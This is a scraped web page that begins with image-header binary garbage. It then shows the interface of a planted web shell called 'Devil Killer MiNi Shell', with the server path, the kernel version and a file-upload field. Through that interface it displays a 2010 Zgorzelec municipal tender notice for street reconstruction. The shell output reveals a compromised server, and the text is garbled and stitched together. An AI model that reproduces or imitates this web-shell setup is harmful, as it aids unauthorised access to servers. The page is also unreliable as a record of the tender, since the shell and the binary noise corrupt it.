JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20101007/322742-N-2010.html

<p class="kh_header"><b>Zgorzelec: Rewitalizacja Śródmieścia</b><br>
<b>Numer ogłoszenia: 322742 - 2010; data zamieszczenia: 07.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Śródmieścia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem inwestycji jest rewitalizacja ulicy Daszyńskiego na odcinku od skrzyżowania  z ul. Struga do skrzyżowania z ul. Piłsudskiego i Kościuszki oraz ulicy Cienistej na odcinku od ul. Daszyńskiego do mostu im. Jana Pawła II w Zgorzelcu polegająca na przebudowie elementów drogi wraz z oświetleniem ulicznym i częściowo kanalizacją deszczowa - w tym budowę nowych kanałów. 
2) Planowana inwestycja znajduje się w strefie B ochrony konserwatorskiej.                  
Roboty budowlane prowadzone będą na terenie działek o nr ewidencyjnych: 116 - AM1, 109, 125, 138, 159 - AM4, obręb IV - miasta Zgorzelec; 3 - AM1, obręb VII miasta Zgorzelec w granicach oznaczonych na załączonej mapie ewidencyjnej w skali 1:1000.
3) Roboty budowlane dla obejmują:
a) Przebudowę jezdni ul. Daszyńskiego na odcinku od skrzyżowania z ul. Struga do  
skrzyżowania z ul. Cienistą, jako jezdni o dwóch pasach ruchu i o łącznej szerokości 7,00 mb, 
b) Przebudowę jezdni ul. Daszyńskiego na odcinku od skrzyżowania z  ulicą Cienistą do skrzyżowana z ul. Kościuszki i ul Piłsudskiego, jako jezdni o trzech pasach ruchu i o łącznej szerokości 9,50 mb,
c) Przebudowę chodników obustronnych o szerokości zmiennej, min. 1,90 mb zlokalizowanych bezpośrednio przy jezdni lub odsuniętych od jej krawędzi, położonych wzdłuż ul. Daszyńskiego, na odcinku od skrzyżowania z ul. Struga do skrzyżowania z ul. Kościuszki i ul. Piłsudskiego, wraz z miejscami postojowymi prostopadłymi lub równoległymi do jezdni w formie wydzielonych zatok o wymiarach stanowiska postojowego 2,30 x 5,00(4,50) mb oraz 3,60 x 5,00 mb dla osób  niepełnosprawnych,
d) Przebudowę ul. Cienistej na odcinku od skrzyżowania z ul. Daszyńskiego do mostu im. Jana Pawła II.
e) Zieleń stanowić będą trawniki, drzewa i krzewy.
4) Zakres robót budowlanych, przewiduje przebudowę ciągów komunikacyjnych w tym:
-        jezdnia - 4.718,00 m2
-        chodniki - 3.210,00 m2
-        miejsca postojowe - 688,00 m2
-        zjazdy - 242,00 m2
-        zieleń - 650,00 m2
-        słupy oświetleniowe - 51 sztuk,
-        kanalizacja deszczowa fi 300 - 107,34 mb,
-        studnie rewizyjne z kręgów betonowych dn 1200 - 7 szt.,
-        studzienki ściekowe - 30 szt.
-        remont muru oporowego zlokalizowanego na działce nr 109 przy ul Daszyńskiego,
-        remont muru oporowego od posesji nr 42 do posesji na działce 96 przy                            ul. Daszyńskiego,
-        remont studzienki oraz placu przy skrzyżowaniu ul. Daszyńskiego z ul. Struga.
5) Długość ulicy Daszyńskiego w granicach opracowania od skrzyżowania z ul. Struga do skrzyżowania z ul. Kościuszki i ul. Piłsudskiego wynosi 515,39 m, natomiast ulicy Cienistej 132,87 mb.
6)  Kontrakt z wykonawcą robót budowlanych prowadzony będzie według warunków kontraktowych FIDIC - Warunki Kontraktowe dla budowy dla robót inżynieryjno-budowlanych projektowanych przez zamawiającego - 4 wydanie angielsko-polskie niezmienione 2008 (tłumaczenie 1 wydania 1999) Stowarzyszenie Inżynierów Doradców i Rzeczoznawców SIDiR.
7) Szczegółowy opis robót budowlanych zawiera dokumentacja projektowa - Projekt Budowlany Przebudowa ul. Daszyńskiego oraz ul. Cienistej w Zgorzelcu; Rewitalizacja Śródmieścia w Zgorzelcu, opracowany w listopadzie 2009 roku przez OLEX Firma Budowlano-Inżynieryjna, Aleksander Lorych, 58-560 Jelenia Góra, ul. Strzelecka 6, stanowiący załącznik nr 7 do  SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 6 ustawy PZP, stanowiącego nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> I.	Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:
                                                  
                                                           52.500,- PLN   
słownie: pięćdziesiąt dwa tysiące pięćset  
               złotych 00/100
II.	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm., tekst jednolity Dz.U.2007.42.275.).
III.	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji / poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
c)	kwotę gwarancji/poręczenia,
d)	termin ważności gwarancji/poręczenia,
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji/poręczenia w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
	odmówił podpisania umowy na warunkach określonych w ofercie, lub
	nie wniósł zabezpieczenia należytego wykonania umowy, lub
	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
f)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji/poręczenia w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca:
	w odpowiedzi na wezwanie Zamawiającego, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy prawo zamówień publicznych, lub pełnomocnictw
     Zabronionym jest umieszczenie w treści tego dokumentu jakiejkolwiek klauzuli lub 
    zapisu stanowiącego, że wypłata wadium w okolicznościach określonych w ppkt. f 
    będzie uzależniona od dodatkowych okoliczności dowodowych, które spełnić ma 
     Beneficjent. 
IV.	  Wadium wnoszone w pieniądzu należy wpłacić na rachunek Zamawiającego:
      Nr 35124012971111000025654013 w banku PEKAO S.A. I  O/Zgorzelec.
      na przelewie należy  umieścić informację : Wadium do postępowania Rewitalizacja Śródmieścia
V.	Wadium wnoszone w innych dopuszczonych przez ustawę pzp formach należy złożyć  w oryginale wraz z oryginałem oferty, kopię wraz z kopią oferty. 
VI.	Wadium należy wnieść przed upływem terminu składania ofert, 
VII.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na 
      wezwanie, o którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o 
       których mowa w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to 
      z przyczyn nieleżących po jego stronie.
VIII.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego 
        oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 

    a) Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych 
        w art. 22 ust. 1 ustawy Prawo Zamówien Publicznych
Uwaga: Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, oświadczenie, o którym mowa, może być złożone przez każdego z Wykonawców składających ofertę wspólną oddzielnie (jedynie w sytuacji, jeśli każdy z nich spełnia wszystkie warunki samodzielnie), albo może być złożone wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez pełnomocnika lub przez osoby reprezentujące wszystkich wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia / nie spełnia, na podstawie analizy treści:

  Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Za wystarczające Zamawiający uzna wykazanie przez Wykonawcę wykonanych   2 robót budowlanych polegających na budowie/przebudowie/modernizacji  drogi, chodnika, ciągu pieszo-jezdnego, ciągu pieszo-rowerowego, ścieżki rowerowej, placu o nawierzchni z kostki kamiennej lub nawierzchni z kostki kamiennej łączonej z innym materiałem w której powierzchnia z kostki kamiennej stanowi co najmniej 60 % powierzchni o łącznej powierzchni co najmniej 8000 m2 i wartości robót budowlanych minimum 2 mln PLN (netto) ,
Do przeliczenia wszystkich wartości występujących w innych walutach niż PLN,  Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP),  opublikowany w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 

    a) Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych 
        w art. 22 ust. 1 ustawy Prawo Zamówien Publicznych
Uwaga: Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, oświadczenie, o którym mowa, może być złożone przez każdego z Wykonawców składających ofertę wspólną oddzielnie (jedynie w sytuacji, jeśli każdy z nich spełnia wszystkie warunki samodzielnie), albo może być złożone wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez pełnomocnika lub przez osoby reprezentujące wszystkich wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku  
Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
      - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
        budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, 
        doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także  
        wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi 
        osobami.
       Zamawiający żąda aby Wykonawca dysponował lub miał możliwość dysponowania  
       następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:
	  Przedstawiciel Wykonawcy posiadający - doświadczenie zawodowe w zarządzaniu Kontraktem prowadzonym zgodnie z Warunkami kontraktowymi FIDIC lub równoważnymi jako Przedstawiciel Wykonawcy, Kierownik Kontraktu, Kierownik Projektu, Zastępca Kierownika Kontraktu, Pełnomocnik ds. Realizacji Projektu, Inżynier Rezydent itp.  budowy/przebudowy/modernizacji co najmniej 1 drogi i o wartości robót budowlanych minimum 2 mln PLN (netto).
       Za równoważne z Warunkami kontraktowymi FIDIC, Zamawiający uzna inne warunki   
       kontraktowe np. UAR, UAV, przy czym na Wykonawcy ciążyć będzie obowiązek 
       udowodnienia równoważności tych warunków kontraktowych w przypadku wykazania  
       takiej usługi w wykazie,    
	  Kierownik budowy w specjalności drogowej posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie  z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
- minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót drogowych (liczone od daty uzyskania uprawnień budowlanych),
- 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu co najmniej 1 inwestycją polegającą na budowie/przebudowie/modernizacji drogi, chodnika, ciągu pieszo-jezdnego, ciągu pieszo-rowerowego, ścieżki rowerowej, placu o nawierzchni z kostki kamiennej lub nawierzchni z kostki kamiennej łączonej z innym materiałem w której powierzchnia  z kostki kamiennej stanowi co najmniej 60 % powierzchni o łącznej powierzchni co najmniej 6000 m2 i wartości robót budowlanych minimum 2 mln PLN (netto).
	Kierownik robót budowlanych w specjalności sanitarnej posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane (wystarczający zakres w specjalności sieci i urządzenia wodociągowe i kanalizacyjne), które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
- minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót sieciowych kanalizacyjnych lub wodociągowych (liczone od daty uzyskania uprawnień budowlanych),
- 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu budowy/przebudowy/modernizacji co najmniej 1 inwestycji drogowej w zakresie której znajdowało się odwodnienie drogi  i o wartości robót budowlanych minimum 0,5 mln PLN (netto).
	Kierownik robót budowlanych w specjalności elektrycznej posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
  - 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
 -   minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót sieciowych elektrycznych i elektroenergetycznych (liczone od daty uzyskania uprawnień budowlanych),
 - 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu budowy/przebudowy/modernizacji co najmniej 1 inwestycji drogowej w zakresie której znajdowało się oświetlenie drogi z liczbą słupów oświetleniowych nie mniejszą niż 40  i o wartości robót budowlanych minimum 0,5 mln PLN (netto).
Zamawiający dopuszcza wykazanie przez Wykonawcę osób będących obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym posiadających dokumenty potwierdzające nabycie kwalifikacji zawodowych do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej wraz z odpowiednia decyzją o uznaniu kwalifikacji zawodowych zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów.
Funkcja Przedstawiciela Wykonawcy nie może być łączona z funkcjami Kierownika  
Budowy i Kierownika robót.
Do przeliczenia wszystkich wartości występujących w innych walutach niż PLN,   
Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP), opublikowany 
w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
- Oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają 
wymagane  uprawnienia, jeżeli ustawy nakładają obowiązek  posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku odbędzie się według formuły spełnia/nie spełnia, na podstawie analizy treści: 
- informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków  finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu  o udzielenie zamówienia albo składania ofert;
Zamawiający żąda aby Wykonawca posiadał środki finansowe lub zdolność kredytową  w wysokości, co najmniej 3.000.000 PLN;
Do przeliczenia wszystkich wartości występujących w innych walutach niż PLN,   
Zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP), opublikowany w dniu opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

